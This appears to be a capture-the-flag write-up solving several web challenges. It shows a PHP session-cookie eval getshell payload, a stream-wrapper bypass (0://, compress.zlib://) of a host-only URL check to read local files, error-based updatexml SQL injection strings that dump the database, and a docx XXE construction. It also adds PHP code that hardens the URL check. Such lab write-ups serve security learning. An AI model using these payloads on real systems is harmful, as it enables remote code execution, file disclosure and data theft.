The character-less getshell trick works here.
payload: eval(hex2bin(session_id(session_start())))
Just set the PHPSESSID cookie value to the hex encoding of the PHP code you want run.
Decode the parameter after file twice with base64 and you will see it can include other files; double-base64-encode the target you want.
First, read index.php:
<?php
// index.php as recovered from the challenge. The HTML tags that surrounded the
// echo'd values were stripped in extraction, leaving the empty '' strings.
error_reporting(E_ALL || ~E_NOTICE);   // || rather than |, so this is error_reporting(1)
header('content-type:text/html;charset=utf-8');
if (!isset($_GET['file']))
    header('Refresh:0;url=./index.php?file=WTNSbWFXMWhaMlV1YW5Cbg==');   // double base64 of ctfimage.jpg
$file = base64_decode(base64_decode($_GET['file']));   // two layers of base64
echo '' . $_GET['file'] . '';
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);   // keeps only [a-zA-Z0-9.], so no / or ..
echo 'input_filename: ' . $file . '';
$file = str_replace("ctf", "flag", $file);             // "ctf" in the name becomes "flag"
echo 'real_filename: ' . $file . '';
$txt = base64_encode(file_get_contents($file));        // file read, returned base64-encoded
echo "\n";
/*
 * Can you find the flag file?
 *
 * Hint: hal0flagi5here.php
 */
/*
* Can you find the flag file?
*
* Hint: hal0flagi5here.php
*/
Next, read hal0flagi5here.php:
<?php
// hal0flagi5here.php as recovered from the challenge
$argv[1] = $_GET['url'];
if (filter_var($argv[1], FILTER_VALIDATE_URL))
{
    $r = parse_url($argv[1]);
    print_r($r);
    // only the host is checked; the scheme is left entirely to file_get_contents()
    if (preg_match('/happyctf\.com$/', $r['host']))
    {
        $url = file_get_contents($argv[1]);
        echo($url);
    } else
    {
        echo("error");
    }
} else
{
    echo "403 Forbidden";
}
?>
I was stuck here for a long time: with data://happyctf.com/plain,base64,xxxxx you can only construct the response body, not read arbitrary files.
Testing showed that when file_get_contents() is given a non-standard protocol it performs a local file include instead, so construct:
0://happyctf.com/../../../../flag.txt
compress.zlib://happyctf.com/../../../../../../flag.txt
Both of these work.
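As a defender's counterpart to the bypass above, here is an added hardening example (my own code, not the challenge's or the writeup's): a replacement for the URL check in hal0flagi5here.php that allowlists the scheme and compares the host label-wise, so a wrapper such as compress.zlib:// never reaches file_get_contents(). The function and constant names are assumptions, as is PHP 8 for str_ends_with().

```php
<?php
// Added hardening example, not the challenge's or the writeup's code: a
// replacement for the URL check in hal0flagi5here.php, which only inspects the
// host while file_get_contents() honours every stream wrapper. Names are mine;
// assumes PHP 8+ for str_ends_with().
const ALLOWED_SCHEMES = ['http', 'https'];
const ALLOWED_HOST    = 'happyctf.com';
function is_safe_fetch_url(string $url): bool
{
    $r = filter_var($url, FILTER_VALIDATE_URL) === false ? false : parse_url($url);
    if ($r === false || !isset($r['scheme'], $r['host'])) {
        return false;
    }
    // 1. Scheme allowlist: 0://, compress.zlib://, php://, data://, file://
    //    are rejected before file_get_contents() ever sees them.
    if (!in_array(strtolower($r['scheme']), ALLOWED_SCHEMES, true)) {
        return false;
    }
    // 2. Exact host or a true subdomain, compared label-wise; the original
    //    /happyctf\.com$/ regex would also accept evilhappyctf.com.
    $host = strtolower($r['host']);
    if ($host !== ALLOWED_HOST && !str_ends_with($host, '.' . ALLOWED_HOST)) {
        return false;
    }
    // 3. No userinfo: "user:pass@" in the authority is never legitimate here.
    return !isset($r['user']) && !isset($r['pass']);
}
function fetch_if_allowed(string $url): string
{
    if (!is_safe_fetch_url($url)) {
        return 'error';
    }
    // No redirects: a 302 from the allowed host could otherwise bounce off-host.
    $ctx  = stream_context_create(['http' => ['follow_location' => 0, 'timeout' => 5]]);
    $body = file_get_contents($url, false, $ctx);
    return $body === false ? 'error' : $body;
}
// Constructed inputs: the two bypasses from the writeup, a look-alike host,
// and one legitimate URL.
$samples = [
    'compress.zlib://happyctf.com/../../../../../../flag.txt',
    '0://happyctf.com/../../../../flag.txt',
    'http://evilhappyctf.com/',
    'https://www.happyctf.com/index.html',
];
foreach ($samples as $u) {
    printf("%-58s %s\n", $u, is_safe_fetch_url($u) ? 'allowed' : 'rejected');
}
```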
Pages like this one, with registration, login and password-change forms, are usually a second-order injection.
ccc"||updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e),1)#
ccc"||updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema=database())),0x7e),1)#
ccc"||updatexml(1,concat(0x7e,(select(flag)from(flag)),0x7e),1)#
Download the template docx, rename the extension to zip, and edit docProps/core.xml directly inside the zip.
The file content is as follows (the DOCTYPE with the entity declaration survived extraction only as its closing "]>", and the closing tags lost their "</"; both are restored here, with a placeholder for the entity's SYSTEM target):
<!DOCTYPE cp:coreProperties [
  <!ENTITY xxe SYSTEM "ENTITY_TARGET_PLACEHOLDER">
]>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <dc:title>&xxe;</dc:title>
  <dc:subject></dc:subject>
  <dc:creator></dc:creator>
  <cp:keywords></cp:keywords>
  <dc:description></dc:description>
  <cp:lastModifiedBy></cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-08-01T19:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-08-01T19:01:00Z</dcterms:modified>
</cp:coreProperties>
Rename it back to .docx and upload it.